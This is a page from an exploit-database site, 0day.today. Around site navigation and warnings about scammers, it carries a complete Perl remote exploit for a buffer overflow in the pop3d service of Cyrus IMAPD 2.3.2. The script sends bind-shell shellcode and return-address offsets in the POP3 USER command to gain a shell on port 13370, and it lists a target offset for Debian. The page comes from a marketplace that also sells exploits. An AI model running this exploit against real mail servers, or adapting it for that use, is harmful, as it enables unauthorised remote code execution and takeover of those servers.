0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
============================================================ Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3) ============================================================ #!/usr/bin/perl ## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) ## Name: bid-18056.pl ## Date: 08/12/2006 ## ## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public ## exploits and not either of them worked (not that they don't but coding my own is generaly faster ## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy ## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting... ## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that ## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before ## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have ## done here is used the same method, yet found a data area that is not going to freak pop3d ## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled ## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. ## ## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that ## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something ## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your ## shellcode (because it'll segfault and won't get executed). ## ## Note: bindport is 13370 ################################################################################################################# use IO::Socket; use strict; my $host = $ARGV[0] || help(); my $offset = $ARGV[1] || help(); my $port = 110; # stollen from cyruspop3d.c because this actualy worked, i couldn't get any # metasploit sc to work (as usualy, hmph) my $shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96". "\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56". "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1". "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0". "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53". "\x89\xe1\xcd\x80"; my $sock = IO::Socket::INET->new('PeerAddr' => $host, 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n"); $sock->autoflush(); print $sock "USER "; ## begin USER command with just that print $sock "$shellcode"; ## shellcode is *userbuf is *user print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out print $sock "\n"; ## that simple sub help { print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n"; print "08/12/2006\n\n"; print "perl $0 \$host \$offset\n\n"; print "Offsets: \n"; print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n"; exit(0); } # 0day.today [2024-07-07] #